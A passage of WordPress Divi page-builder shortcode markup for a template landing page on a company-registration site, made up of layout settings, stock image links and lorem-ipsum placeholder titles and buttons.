400;\"]\r\n\r\n<p>It\'s a title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\r\n\r\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"24\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/071-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"34\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>It\'s a title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\r\n\r\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>It\'s a title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\r\n\r\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>It\'s a title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"50px||110px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#2e9bb5\" button_bg_color=\"#ffffff\" button_border_width=\"13\" button_border_color=\"#ffffff\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\r\n\r\n\r\n\r\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/bg3.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Collections Grid\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#a5bdc9\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p>Collections</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Explore the world through collections of beautiful stock photos.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" background_color_1=\"#ffffff\" parallax_2=\"off\" parallax_method_2=\"off\" background_color_2=\"#ffffff\" parallax_3=\"off\" parallax_method_3=\"off\" background_color_3=\"#ffffff\" column_padding_mobile=\"on\" custom_padding=\"60px|||\" gutter_width=\"2\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_thumb1.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_thumb1.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_thumb2.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" background_color_1=\"#ffffff\" parallax_2=\"off\" parallax_method_2=\"off\" background_color_2=\"#ffffff\" parallax_3=\"off\" parallax_method_3=\"off\" background_color_3=\"#ffffff\" column_padding_mobile=\"on\" custom_padding=\"10px|||\" gutter_width=\"2\" custom_padding_tablet=\"-10px|||\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_thumb.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05_thumb.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06_thumb.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"on\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.6em\"]\r\n\r\n<p>Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||24px|\" custom_css_main_element=\"font-weight: 400;\" text_line_height=\"1.2em\"]\r\n\r\n<p>Sub-heading</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"50px||110px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#1fbacd\" button_border_width=\"13\" button_border_color=\"#1fbacd\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#1fbacd\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\r\n\r\n\r\n\r\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Features\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Features</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Built to perform.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Built to perform.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"54px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||124px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" 